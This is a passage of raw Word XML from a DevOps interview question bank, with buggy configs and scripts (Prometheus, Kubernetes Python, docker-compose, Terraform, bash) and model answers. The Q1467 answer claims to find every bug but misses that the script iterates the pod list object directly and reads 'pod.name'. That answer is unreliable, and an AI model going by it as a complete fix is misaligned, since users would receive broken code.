        <w:t>Q1466. Debug this Prometheus alert rule: This alert is supposed to page only on sustained high error rate, but it pages on every brief blip. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>groups:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  - name: api-alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    rules:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - alert: HighErrorRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        expr: rate(http_requests_total{status="500"}[1m]) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        labels:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          severity: page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        annotations:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          summary: "Error rate is high"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) The alert condition "&gt; 0" fires on any 500 error at all within a 1-minute window, no matter how brief or low-volume, causing pages on normal transient blips rather than sustained problems - it should compare against a meaningful rate threshold (e.g. &gt; 0.05, representing 5% error rate) using a ratio of errors to total requests, not an absolute count &gt; 0. (2) There is no "for:" clause, so the alert fires immediately on the first evaluation that matches rather than requiring the condition to be sustained over a period (e.g. for: 5m), which is exactly what causes brief blips to page instead of only sustained issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1467. Debug this Python Kubernetes automation script: This is supposed to find and log CrashLoopBackOff pods across all namespaces, but has a bug that makes it miss most of them. Find every issue.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>from kubernetes import client, config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config.load_kube_config()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>v1 = client.CoreV1Api()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>def find_crashloop_pods():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    pods = v1.list_pod_for_all_namespaces()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    for pod in pods:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        for status in pod.status.container_statuses:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            if status.state.waiting.reason == "CrashLoopBackOff":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">                print(pod.name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) pod.status.container_statuses can be None (for example while a pod is still being scheduled or has no container statuses yet), and iterating over it directly with a for loop will raise a TypeError - this needs a guard like "for status in (pod.status.container_statuses or []):". (2) status.state.waiting can also be None when the container is in a running or terminated state rather than waiting, so accessing status.state.waiting.reason directly will raise an AttributeError on any pod that isn't currently in a waiting state - this needs to check "if status.state.waiting and status.state.waiting.reason == 'CrashLoopBackOff'" first. Because of these two unguarded accesses, the script will crash on the very first pod that doesn't match the exact expected shape, meaning it likely never gets far enough to actually report most real CrashLoopBackOff pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1468. Debug this docker-compose file: This is supposed to run the app with a Postgres database, but the app can never connect. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>version: '3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  app:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    build: .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - 8080:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - DB_HOST=localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - DB_PASSWORD=secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    depends_on:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  db:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - POSTGRES_PASSWORD=different_secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) DB_HOST=localhost is wrong inside a Docker Compose network - "localhost" refers to the app container itself, not the db container; it should be DB_HOST=db, using the Compose service name as the hostname, since Compose provides automatic DNS resolution between services on the same network. (2) DB_PASSWORD=secret in the app service doesn't match POSTGRES_PASSWORD=different_secret in the db service - these must be the same value for the app to authenticate successfully against Postgres. (3) depends_on only controls container start order, not whether Postgres is actually ready to accept connections yet - without a healthcheck and condition: service_healthy, the app may still try to connect before Postgres has finished initializing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1469. Debug this Terraform variable and output block: This module fails validation and leaks a secret in plan output. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>variable "api_key" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  type = string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>variable "environment" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  type    = string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  default = "prod"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  validation {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    condition     = var.environment in ["dev", "staging", "prod"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    error_message = "environment must be dev, staging, or prod"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>output "api_key" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  value = var.api_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) The validation condition "var.environment in [...]" is not valid Terraform syntax - Terraform's validation block requires a boolean expression using contains(), like "contains(["dev", "staging", "prod"], var.environment)", not Python-style "in". (2) The api_key variable has no "sensitive = true" marking, so its value would be shown in plain text in plan/apply output and logs. (3) The output block for api_key directly exposes the secret value in Terraform's output and in state - at minimum it needs "sensitive = true" on the output too, and ideally the module shouldn't output a raw secret at all; the value should be referenced directly by whatever needs it rather than round-tripped through an output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1470. Debug this shell deployment script: This script is supposed to build, tag, push, and deploy safely, but a single failure anywhere lets it continue to the next step. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IMAGE=my-app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TAG=$(git rev-parse HEAD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker build -t $IMAGE:$TAG .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker push $IMAGE:$TAG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl set image deployment/my-app app=$IMAGE:$TAG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl rollout status deployment/my-app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>echo "Deployment complete"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) No "set -e" (or "set -euo pipefail") at the top, so if any command fails - the docker build, the push, or the kubectl commands - the script keeps running the next command anyway, potentially deploying a broken or stale image, or rolling out an image that was never actually pushed successfully. (2) There's no check after "kubectl rollout status" to verify it actually succeeded before printing "Deployment complete" - rollout status does return a non-zero exit code on failure, but without set -e that failure is silently ignored and the success message prints regardless. (3) No rollback path is defined if the rollout fails. (4) TAG is derived from the full git commit SHA with no fallback if git rev-parse fails (e.g. not in a git repo), which combined with the missing error handling could push and deploy with an empty or malformed tag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1471. Python automation: How would you use the Kubernetes Python client to find CrashLoopBackOff, ImagePullBackOff, Pending, and high-restart pods across namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the official kubernetes Python client to list pods with CoreV1Api().list_pod_for_all_namespaces(), then inspect status.container_statuses for waiting.reason values like CrashLoopBackOff and ImagePullBackOff, status.phase == 'Pending' for scheduling issues, and status.container_statuses[].restart_count above a threshold for flapping pods. Group results by namespace and reason, and export a CSV or Slack summary so on-call engineers can triage quickly without running kubectl by hand across many clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1472. Python error handling: How would you design retries, exponential backoff, timeouts, and idempotency for a Python cloud API automation tool?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Wrap outbound calls with a retry decorator (e.g. tenacity) using exponential backoff with jitter, capped retry count, and a per-call timeout so one hung request cannot block the whole run. Only retry on transient errors (429, 5xx, connection resets), never on 4xx validation errors. Make operations idempotent by using deterministic request keys or checking current state before mutating, so a retried call after a partial failure does not double-apply changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1473. Python logging: How would you implement structured logging, correlation IDs, and metrics in a Python operational tool?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the standard logging module with a JSON formatter so every log line is machine-parseable, and attach a correlation/request ID via a contextvar or logging filter so all log lines for one operation can be grepped together. Emit counters and timers (e.g. via prometheus_client or OpenTelemetry) for calls made, retries, failures, and duration, and ship logs to Cloud Logging or an ELK stack so incidents can be traced end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1474. Python data parsing: How would you parse large JSON, YAML, CSV, or log files safely and produce an incident summary?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream large files instead of loading them fully into memory - use ijson for large JSON, csv.reader/DictReader with a generator for CSV, and line-by-line iteration for logs. Validate and coerce types defensively so one malformed record does not crash the whole parse, and aggregate counts, top error signatures, and time ranges into a structured summary object that can be rendered as a short incident report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1475. Python packaging: How would you package, version, document, and release an internal Python CLI used by platform teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Package with pyproject.toml and setuptools/hatch, pin dependencies with a lockfile, and use semantic versioning tied to git tags so consumers know what changed. Publish to an internal PyPI-compatible registry (Artifact Registry Python repo), generate docs from docstrings, and gate releases behind CI that runs lint, type checks, and tests before publishing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1476. Python security: How would you prevent secrets from leaking through environment variables, logs, stack traces, process arguments, or CI output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Never pass secrets as CLI arguments (visible in process listings and shell history); read them from a secret manager or masked environment variables instead. Scrub log formatters and exception handlers to redact known secret patterns, avoid printing full config/env dumps, and configure CI to mask secret values in job output so a stack trace or debug print cannot exfiltrate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1477. Python code review: What would you check in a Python automation PR before allowing it to run against production infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check for a dry-run mode, explicit confirmation on destructive actions, proper error handling and retries, least-privilege credentials, and no hardcoded secrets or environment-specific values. Verify there are unit tests covering failure paths, structured logging for auditability, and that the script is idempotent so a re-run after a partial failure is safe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1478. Python interview coding: Write the approach for a function that calculates SLO compliance and remaining error budget from request totals and failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Compute the success rate as (total_requests - failed_requests) / total_requests, compare it against the SLO target to get compliance, and calculate the error budget as (1 - slo_target) * total_requests; remaining budget is error_budget - failed_requests. Guard against division by zero when total_requests is 0, and return both the raw numbers and a percentage so the caller can decide whether to gate a release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1479. Python type hints: How would you use type hints, dataclasses, and mypy to make a platform automation codebase safer and easier to review?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add type hints to function signatures and use dataclasses (or Pydantic models) for structured config and API payloads instead of loose dicts, so typos and shape mismatches are caught before runtime. Run mypy in CI in strict mode on critical modules to catch None-handling bugs and incorrect API usage early, which matters most for scripts that touch production infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1480. Python decorators: How would you write a decorator that adds retries, timing, and structured logging to any cloud automation function?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Write a decorator using functools.wraps that times the call with time.perf_counter, wraps the invocation in a retry loop with exponential backoff on transient exceptions, and logs a structured entry with function name, duration, attempt count, and outcome. Keep the decorator generic by accepting the wrapped function's args/kwargs transparently so it composes with any automation function without changing its signature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
